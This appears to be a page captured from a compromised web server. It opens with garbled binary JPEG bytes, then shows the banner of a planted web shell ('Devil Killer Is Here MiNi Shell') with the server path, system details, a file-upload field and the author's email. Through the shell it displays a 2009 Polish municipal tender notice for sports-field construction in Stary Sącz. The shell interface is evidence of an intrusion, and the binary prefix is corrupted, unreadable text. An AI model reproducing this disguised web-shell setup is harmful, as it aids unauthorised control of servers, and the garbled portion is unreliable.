JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090812/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090812/132071-N-2009.html

<p class="kh_header"><b>Stary Sącz: budowa wielofunkcyjnych boisk sportowych w miejscowości Stary Sącz,  Gmina Stary Sącz, Województwo Małopolskie w ramach programu Moje boisko - Orlik 2012</b><br>
<b>Numer ogłoszenia: 132071 - 2009; data zamieszczenia: 12.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta  i Gminy Stary Sącz , ul. Stefana Batorego 25, 33-340 Stary Sącz, woj. małopolskie, tel. 018 4460270, faks 018 4460273.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.stary.sacz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> budowa wielofunkcyjnych boisk sportowych w miejscowości Stary Sącz,  Gmina Stary Sącz, Województwo Małopolskie w ramach programu Moje boisko - Orlik 2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zamówienie publiczne obejmuje wykonanie robót budowlanych wg :  
- dokumentacji projektowej,
- specyfikacji technicznej wykonania i odbioru robót,
- przedmiaru robót,
- wizji lokalnej w miejscu realizacji zamówienia publicznego.

2. Zakres robót budowlanych :
- roboty przygotowawcze,
- boisko do gry w piłkę nożną,
- boisko do piłki siatkowej i koszykowej,
- ogrodzenie boisk, furtki wejściowe i brama wjazdowa,
- chodniki i place z kostki betonowej,
- studnia - osadnik, korytka ściekowe, kanalizacja odwodnieniowa z rur betonowych fi 300 mm,
- zieleń - trawniki przy boiskach oraz zadrzewienie, schody terenowe długości 3,5 m,
- skrzynka pomiarowa SP, tablica TR i wyłącznik WG,
- oświetlenie boisk sportowych.

3.Do obowiązków Wykonawcy należeć będzie również ;
*  organizacja placu budowy,
* zabezpieczenie placu budowy przed dostępem osób trzecich,
* prowadzenie robót budowlanych zgodnie z zasadami Kodeksu Pracy oraz przy przestrzeganiu zasad bhp, 
   ochrony zdrowia i środowiska oraz ochrony przeciwpożarowej,
* pokrycie kosztów zużycia energii elektrycznej i wody..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1, 45.21.20.00-6, 45.34.20.00-6, 45.23.32.22-1, 45.31.23.11-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> WADIUM : 15.000,00 złotych 
Do wniesienie - wpłacenia na rachunek Bankowy Zamawiającego w Banku Spółdzielczym w Starym Sączu  09 8816 0001 2001 0000 0013 0006, w terminie  do 2 września 2009 roku , do godziny 8.45<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki
określone w art. 22 ust. 1 pkt. 1-3 ustawy Pzp, tj.:
1) posiadają uprawnienia do wykonywania określonej w przedmiocie zamówienia
działalności lub czynności;
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i
osobami zdolnymi do wykonania zamówienia tj.:
a) wykonali w ciągu ostatnich 5 lat przed dniem wszczęciem postępowania o udzielenie
zamówienia tj. dniem 2 września 2009 roku a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowali co najmniej jedną robotę budowlaną odpowiadającą swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia (budowa boisk i budowli sportowych - klasa 2411 wg Polskie Kategorii Obiektów Budowlanych), w tym jedno boisko sportowe o nawierzchni z trawy syntetycznej, z podaniem ich wartości, przedmiotu oraz daty i miejsca wykonania (wzór stanowi Załącznik Nr 5 do SIWZ). Do wykazu Wykonawca musi również dołączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie (referencje, protokoły odbioru, itp.),
b) dysponują osobą/osobami posiadającą/posiadającymi uprawnienia do kierowania robotami budowlanymi w specjalnościach: 
1) konstrukcyjno-budowlanej,
2) instalacyjnej w zakresie sieci, instalacji i urządzeń  wodociągowych i kanalizacyjnych, 
3) instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.
Wykonawca zobowiązany jest dołączyć do oferty ksero, potwierdzone za zgodność
z oryginałem, takich uprawnień oraz zaświadczenie, wydane przez właściwą izbę
samorządu zawodowego, potwierdzające wpis danej osoby na listę członków właściwej
izby. W/w osoby należy wykazać w wykazie osób i podmiotów (Załącznik nr 6 do SIWZ).
3) wykażą niezbędne do wykonania narzędzia i urządzenia jakimi dysponuje Wykonawca
w kwalifikacjach technicznych (Załącznik nr 7 do SIWZ).
4) wykażą osoby, które będą uczestniczyć w wykonywaniu zamówienia w kwalifikacjach technicznych (Załącznik nr 7 do SIWZ).
5) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia 
tj. posiadają polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 1.000.000,00 złotych.
6) nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy - Pzp.

Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:
2.1. Zamawiający dokona sprawdzenia spełnienia przez Wykonawców wymogów określonych w Prawie zamówień publicznych i SIWZ w zakresie kompletności i jakości oferty, a mianowicie pod uwagę będą brane oferty zawierające: komplet ważnych oświadczeń i dokumentów wymaganych niniejszą specyfikacją. Zamawiający informuje, iż sprawy doświadczenia, referencji, polis rozpatrywane będą łącznie - w przypadku składania ofert wspólnych.
2.2. W zakresie posiadania uprawnień do wykonywania określonej działalności i nie podlegania wykluczeniu z postępowania na podstawie art.24 ustawy: pod uwagę będą brane oferty, w których udokumentowano: zgodność prowadzonej działalności gospodarczej z zakresem objętym zamówieniem.
 2.3. Zamawiający zastrzega sobie prawo szczegółowego sprawdzenia stanu faktycznego 
 z przedłożonymi dokumentami, w tym również poprzez wezwanie Oferenta do wyjaśnienia 
  treści dokumentów.

  2.4. Zamawiający wzywa Oferentów, którzy w określonym terminie nie złożyli oświadczeń i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu lub którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie, chyba że mimo ich uzupełnienia konieczne byłoby unieważnienie postępowania. Oświadczenia lub dokumenty powinny potwierdzać spełnianie przez Oferenta warunków udziału w postępowaniu nie później niż w dniu wyznaczonym przez Zamawiającego jako termin uzupełnienia oświadczeń lub dokumentów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. OŚWIADCZENIA :
Oświadczenie o spełnianiu warunków art.22 ustawy Prawo Zamówień Publicznych.
W przypadku złożenia oferty wspólnej - oświadczenie że podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia.

B. DOKUMENTY (potwierdzające spełnienie warunków, o których mowa w art.22, ust.1 ustawy Prawo zamówień publicznych) :
1. W celu potwierdzenia, że Wykonawca posiada uprawnienia do określonej działalności
lub czynności oraz nie podlega wykluczeniu na podstawie art. 24, ust 1 - 2 ustawy Pzp:
1.1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
1.2) Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego, oraz oddziału
Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego
Potwierdzających, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
2.. W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez
Wykonawcę niezbędnej wiedzy i doświadczenia:
2.1.1). Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem
wszczęcia postępowania o udzielenie zamówienia publicznego tj. dniem  2 września 2009 roku, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowali co
najmniej jedną robotę budowlaną odpowiadającą swoim rodzajem robotom
budowlanym stanowiącym przedmiot zamówienia (budowa obiektów sportowych),
w tym jedno boisko o nawierzchni z trawy syntetycznej, z podaniem ich wartości,
przedmiotu oraz daty i miejsca wykonania .
Dla każdej pozycji wykazu należy załączyć dokumenty (protokoły odbioru, referencje,
itp.) potwierdzające, że roboty te zostały wykonane należycie.
3.1.1). Dokumenty potwierdzające posiadanie uprawnień budowlanych do kierowania
robotami budowlanymi w specjalnościach: 1) konstrukcyjno-budowlanej,
2) instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych, 3) instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, 
oraz
 zaświadczenie/ zaświadczenia, wydane przez właściwą izbę samorządu zawodowego, potwierdzające wpis danej osoby na listę członków właściwej izby (dokumenty mogą być przedstawione w postaci kserokopii poświadczonych za zgodność z oryginałem).
3.1.2. Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń jaki dysponuje
Wykonawca
4.1.Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia 
5.1. W celu potwierdzenia opisanego przez Zamawiającego warunku znajdowania się przez Wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie
zamówienia: polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności
gospodarczej, na na kwotę 1.000.000,00 PLN.
Przy składaniu ofert przez Wykonawców wspólnie ubiegających się o udzielenie
zamówienia Wykonawcy mogą złożyć jedną wspólną polisę potwierdzającą, że wszyscy Wykonawcy są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
6.1. Wykaz oświadczeń lub dokumentów potwierdzających spełnianie warunków
jakościowych.
6.1. Materiały na boisko z nawierzchnią syntetyczną (nawierzchnia poliuretanowa):
6.1.1. Badania na zgodność z normą PN-EN 14877, lub aprobata techniczna ITB, lub
rekomendacja techniczna ITB, lub wynik badań specjalistycznego laboratorium badającego nawierzchnie sportowe, np. Labosport.
6.1.2. Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta.
6.1.3. Atest PZH dla oferowanej nawierzchni.
6.1.4. Autoryzacja producenta nawierzchni poliuretanowej, wystawiona dla wykonawcy na
realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą
nawierzchnię.
6.2. Materiały na boisko do piłki nożnej z trawy syntetycznej (sztuczna trawa):
6.2.1. Badania na zgodność z normą PN-EN 15330-1, lub aprobata techniczna ITB, lub rekomendacja techniczna ITB, lub wynik badań specjalistycznego laboratorium badającego nawierzchnie sportowe, np. Labosport.
6.2.2. Certyfikat FIFA (1 Star lub 2 Star) dla oferowanego systemu nawierzchni, lub wyniki badań laboratoryjnych potwierdzające zgodność parametrów oferowanego systemu
nawierzchni z wymogami FIFA.
6.2.3. Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta.
6.2.4. Atest PZH dla oferowanej nawierzchni.
6.2.5. Autoryzacja producenta trawy syntetycznej, wystawiona dla wykonawcy na realizowaną
inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnię..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.stary-sacz.iap.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta ,  w 33-340 Stary Sącz - ul. Stefana Batorego 25 (pokój nr 21 - I piętro).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.09.2009 godzina 08:45, miejsce: Sekretariat Urzędu Miejskiego,  w 33-340 Starym Sączu - ul. Stefana Batorego 25,  (I piętro - pokój nr 18).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com